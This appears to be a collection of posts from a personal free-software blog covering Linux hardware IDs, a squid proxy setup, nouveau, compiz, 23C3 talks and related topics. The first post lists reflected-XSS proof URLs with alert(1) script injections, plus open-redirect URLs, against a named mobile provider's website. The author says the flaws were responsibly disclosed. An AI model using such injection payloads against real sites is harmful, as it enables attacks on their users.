English - 15

Note: This is just a short form of a german article I posted today. E-Plus is a big german mobile telephony provider. I've found a bunch of XSS together with Alexander Brachmann (responsible disclosure, all reported to E-Plus before, probably more to come).

For my english visitors, here are the urls:
http://www.eplus.de/meta/shopsuche/suche_ausgabe.asp?suchwort="><script>alert(1)</script>
http://www.eplus.de/frame.asp?go=http://www.eplus.de/');alert(1);document.write('
http://www.eplus.de/frame.asp?go=');alert('

Already fixed ones:
http://www.eplus.de/frame.asp?go=http://www.google.de/
http://www.eplus.de/frame.asp?go=http://www.eplus.de@www.google.de
http://www.eplus.de/frame.asp?go=http://www.eplus.dedomain.com
http://www.eplus.de/frame.asp?go=http://www.eplus.de.mydomain.com

A thing that people often ask in the free software world: I can't program but I want to help out somewhere.

Theres one thing that's very simple to do for everyone using Linux. We have two tools called lspci and lsusb that look on the pci/usb-bus for installed devices. Each device has an ID, consisting of a vendor ID and a product ID. Everyone can check the own hardware if everything is detectet. For lspci, first run update-pciids, then lspci -v. Each »Unknown« represents some ID that's not in pci.ids. Report the exact device model name to the interface on http://pciids.sourceforge.net/.
For lsusb, run update-usbids and attach all usb devices you can find. lsusb doesn't show Unknown, if after a device number there's only a vendor name, then the ID is unknown. The usb.ids database is much more incomplete than the pci database. They don't have such a fancy interface as pciids, just send it to the current maintainer (listed in the file usually at /usr/share/misc/usb.ids or /usr/share/usb.ids).

I'm actively participating in the OpenStreetMap project since about a week. Today I tagged two roads google maps doesn't know about (so at least in one very small part of the world osm is more accurate than google).
They're the Euro- and D-Mark street in Murrhardt. And yes, they invent stupid street names here.

Binary drivers are imho a hughe problem for free software. Nvidia, leading graphics company, has produced binary linux drivers for a long time and there was no way to get free software 3D-support on their cards.
A group of people is working at the moment on a free nvidia driver, the project is called nouveau. I now had a chance to test the nouveau driver on a nvidia card (nv43). It doesn't do much at the moment, but at least it runs glxgears almost smooth.

It's nice to see development on that front. We made a small video of glxgears running on nouveau. Oh, for all those who can't play theora, I put it up on youtube (but seriously, was just curious how youtube works and if it accepts theora).

Some experimental nouveau-ebuilds, maintained by pq from the nouveau-project, are here:
svn co https://svn.hboeck.de/nouveau-overlay

I live in a dormitory where I get cheap and fast internet access, but http only through a proxy. It's a pity to set this up in all apps every time I come here and disable it again when I wanna get online somewhere else, cause there's no centralized point to do so (there are many apps out there that just ignore http_proxy env var).
Now, it wasn't possible to directly forward http requests to the dormitory proxy, because it misses some options required for that. Maybe it's possible with more iptables skills, would require http-header rewriting.

My solution was setting up a local squid, forward requests via iptables to that and configure the dormitory proxy as a parent. I found that there's a lot of documentation out there, but also lot's of outdated stuff (squid configuration options significantly changed) and stuff you won't understand if you are no proxy-guru.

Now, some lines in my squid.conf:
http_port 7777 transparent
visible_hostname 127.0.0.1
acl local src [myip]/255.255.255.255
http_access allow local
cache_peer proxy.mynetwork.com parent 3128 3130 proxy-only

First line enables all Options required to allow transparent http and sets the port to 7777 (can be anything, just shouldn't collide with any service you might run). visible_hostname is required, something that resolves to localhost. The acl and http_access lines will deny any requests from other hosts, and finally, cache_peer sets the upstream proxy (just replace proxy.mynetwork.com with whatever your network proxy is).
Beside, there's some line starting with hierarchy_stoplist, you need to comment that out, else it won't allow you to use urls with GET variables.

Now, for the iptables-part, it's pretty simple:
iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to 127.0.0.1:7777

I've now added squid to my default runlevel, it doesn't take that long to start. My network setup scripts contain above iptables-line for the dormitory and the squid is just ignored elsewhere. One problem though I haven't debugged enough to know the cause is that sometimes it seems to be unable to deliver POST vars, e. g. the function search of php.net doesn't work.

For your info, my system is Gentoo Linux with squid 2.6.9, iptables 1.3.7 and kernel 2.6.20.

We got a huge trackback spam DDoS the last days that caused our servers to be unavailable for some hours. Most probably caused by some botnet. That's really a pain, you're so defenseless against that kind of threat. Filtering them is like trying to stop ants from entering your house by closing their entrance holes.
But anyway, I decided to write some abuse-mails to the contacts of some of the source IPs. I even got ONE reply (from Neighbourhood Cable, if you're looking for an ISP in australia, have a look at them, they must be good). I also got this:

<k55k559@bora.net|/webmail/mbox5/bora.net/961/k55k559|2|204800|209715200|99999999|99999999|>:
Recipient's maiilbox is full, message returned to sender, (#5.2.2) [7mallot:(209715200), usage:(209874944) [0m

<saehym@bora.net|/webmail/mbox0/bora.net/865/saehym|2|51200|58454016|99999999|99999999|>:
Recipient's maiilbox is full, message returned to sender, (#5.2.2) [7mallot:(52428800), usage:(58474496) [0m

Now, who in the world gives IPs out to people who aren't able to configure their mailboxes? Boranet, the source of that, seems to belong to the company LG, also producing Hardware. Maybe an interesting fact when you buy your next CD burner.

Now, if you've been on the internet a bit longer, you may remember those sites at the end of the 90s telling you that they're »best viewed with a resolution of 1024x768 and the Microsoft Internet Explorer version 6.0". Luckily, most of those pages disappeared with the upcoming success of Mozilla Firefox and others (oh, there are still some, e. g. the cinema in my home town, but ie6 runs on wine).

As you may know, I'm a happy KDE user and have been using Konqueror as my everyday browser for some time now. Recently, I discovered more and more pages I couldn't use any more. I had to start this thing called Firefox. I don't like it, but that is not the point here.
I even noticed today that ebay has a new interface that konqueror doens't like.

This is a result of the more and more upcoming AJAX/JavaScript-stuff, which is often nice, I saw a lot of well designed web applications lately (ok, I saw a lot of crap, too). I'm not enough into JavaScript to know if it's the lack of support by Konqueror or the pages. I just hope that people will come together and find solutions for that. I remember that there was some discussion about using webcore (the khtml-fork used by apples safari) for konqueror, don't know if that would make it better, maybe some users of this drm-crippled system could comment on that.

Read about Metisse just yesterday. A new approach to fancy/3D-Desktops by Mandriva. Unlike compiz, metisse has features that let you actually use windows in transformed status. Mandriva has some videos (Edit 2016: link down, archived version and videos on youtube) that show you some of the features.

As you may already have expected, I couldn't wait to create some ebuilds, so fetch my overlay (which is still called xgl, but don't care about that) for fancy x stuff and run emerge metisse:
svn co https://svn.hboeck.de/xgl-overlay

At the moment it requires it's own X-Server (very much like luminocity or xgl in the past), the window and composite manager is a modified variant of fvwm. After installing, run Xmetisse :1 on one console and on another one metisse-start-fvwm -wd :1. You'll get a fancy new desktop inside a window.

At the moment it very much looks like a design study, not really intuitive to use, but it has some interesting approaches. Nice to see that the linux desktop is evolving. For all non-gentooers, Mandriva has a live CD for you.

Fluendo, a company working with gstreamer, recently announced the availability of commercial, binary codecs for some multimedia formats. They list WMA, WMV, MMS, MPEG-2, MPEG-4, ASF and MP3.

Now, this raises some interesting questions for me: Pretty much all those codecs are already well supported by free implementations, ffmpeg and others. The only exception I can see is WMA3, which is still unsupported by free alternatives, but rarely used. Even the latest Windows Media Video, based on VC-1, has recently gained support by ffmpeg. So from a technical viewpoint, the codecs are basically of very low importance.
The issue that they don't mention in their press release is probably: We provide you with commercial codecs and save you from patent threads. Now that raises the question of software patents. For europe it's very doubtful if the covered patents are legal at all - as we know the EU has rejected the »legalization« of software patents back in 2005, keeping the uncertain situation we had before.

In strategic considerations for the free software community, this case is probably similar to the Novell-Microsoft deal - and raises the same problems Bruce Perens pointed out in his Open Letter: If there's a »licensed« way to use MPEG and other patented formats in linux - then this might weaken the position of projects fighting software patent threats against free software.

So, if you think software patents should be abadoned (which every free software developer should do), raise your voice against questionable patent agreements with those companies earning their money from software patents.

I've just committed some compiz-related updates to Gentoo. First we now have version 0.3.6, the most interesting news is probably that it now has a working kde-window-decorator. gnome/kde-stuff is now only enabled on use-flags, so if you wanna continue to use gconf, you'll have to build compiz with the gnome-flag.
compiz-start tries to autodetect a running kde and then run the kde-window-decorator. If compiz-start fails for you, please report it, because I plan to deprecate all the compiz-aiglx/xgl/nvidia-scripts.

Beside that we now have compiz-settings in the tree, which is a simple configuration-tool for compiz and saves you from using gconf manually.

My favorite talk yesterday was done by Werner Pieper, which was mainly a collection of anecdotes about him being a former drug-dealer. He presented some interesting thoughts and experiences about trust in the illegal world. He also had some interesting stories about piracy-prints.

Today, I watched a talk about TPM and MacOS, which led to a very angry reply at the end by Rüdiger Weiss (who did a lot of work and interesting talks about trusted computing in the past years), sadly there wasn't any time left. Also about DRM, later this day there was a sadly very rarely visited talk by Seth Schoen from the EFF about television standards and the DRM-discussion in the DVB-group (DVB is the european digital video standard). Very detailed information, also many things I didn't know, for example that the industry plans to implement devices that only work in certain areas (by GPS-modules) or in a specific household. Most people seemed to have attended the talk by their »popstar« (Lawrence Lessig), who was placed in the same time slot.

Beside that, I sat some time at the CAcert-booth, helping them assuring visitors. Had some nice talks there and had the feeling that CAcert is really getting forward these days. For example I didn't know till now that Indymedia is using CAcert for their open posting.

Beside that, some people asked me about my desktop-background, it's from an anti-drm/itunes-campagne by the free software foundation and you can find it here.

Still here at the 23C3, I'll try to summarize some things about the talks I've visited yesterday.

First was a presentation about the Trust model of GPG/PGP and an alternative approach. I wasn't so impressed, because I think the main lack from the web-of-trust-infrastructure is that it's too complex to understand for the masses.

The Lightning-Talks were quite nice, some guy presented some live-hacks to a poorly designed travel agency, which was very funny. I personally presented compiz and told some short things about the situation of 3D-graphics and desktops.
I saw about the last 10 minutes of a talk about Drones, camera-supplied small devices flying around, and thoughts what these devices could mean for the society. A group is working on creating such devices on quite small costs. I'll have to fully view that on video after the congress.

Another very interesting Talk: »The gift of sharing«, the referent presented thoughts what kind of »economy-structure« the free software development should be called. It was a bit difficult to follow the talk, as it was in english and I'm no native english speaker. There's a paper from the guy which is probably worth reading.

The last talk was about wiki knowledge and citing that in science. The referents plan to create an RFC for citing-URLs in Wikis.
What irritated me was a computer science professor telling that she wouldn't allow her students to cite wikis, with the stupid argument they should cite their sources from books, completely igonring that science can happen in wikis and it may be the original source of the knowledge, not just something that has been explored elsewhere. Ruediger Weiss gave good arguments against that and mentioned that he thinks wiki is really a new kind of doing science and should be handled as such.

To be continued.

Google has the reputation to be free software-friendly. Without doubt they did a lot in the past, especially many Summer of Code-Projects, that developed essential features for free software projects.

That google is also willing to put legal threat on free software projects if they compete in their are, they recently showed against the project gaia. It was a project to have a replacement client for google earth (google's own client is proprietary). It was done by pure reverse engineering. The author took the project down after he received a letter from google.

It's quite questionable if gaia is doing anything illegal. They didn't use any data from google, they just provided another client for the service. In my opinion it's very important to fight for the right to reverse engineer. Many essential free software projects wouldn't exist if we couldn't reverse engineer. Just think of many hardware drivers, filesystem support, samba, many multimedia codecs, support for proprietary document formats (e. g. doc in OOo) and lot's more.

By the way, I took the freedom to host a copy of the latest gaia-version (and, as requested by some comments, the win32-patch for gaia). It's GPL, so everyone is free to continue the development.

Recently various news pages were posting about the nearing breakthrough of IPv6 (e.g. german newspage golem: IPv6 steht vor dem Durchbruch).

For me, associate of a small and innovative provider, I can't see this breakthrough. It seems nearly impossible to find hosting for dedicated servers which offer native IPv6 (at least with reasonable hardware/price conditions). Yes, I know I can tunnel through sixxs or other tunnel brokers, but I don't want low-speed IPv6 for people who can wait, I want to support IPv6 in same quality and speed than normal IPv4.

If you're working on the small side (dedicated servers, no colocation), you're out of luck twice. You hardly find providers that provide you with more than a few IPv4 IPs and you hardly can do anything to push the next gen IPv6 forward.

My laptop has an internal modem I rarely use. Currently it's one of those moments. It is a so-called winmodem that is no real modem, but just a sound device with a splittet driver: An in-kernel alsa one (free) and a proprietary daemon emulating a modem.

I wondered why some tasks that have nothing to do with network were slow as hell. Now, I knew that it just emulates, but I never thought of that:

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND

30458 root      RT  -6  4384 4384 3588 S 17.3  0.9   8:37.33 slmodemd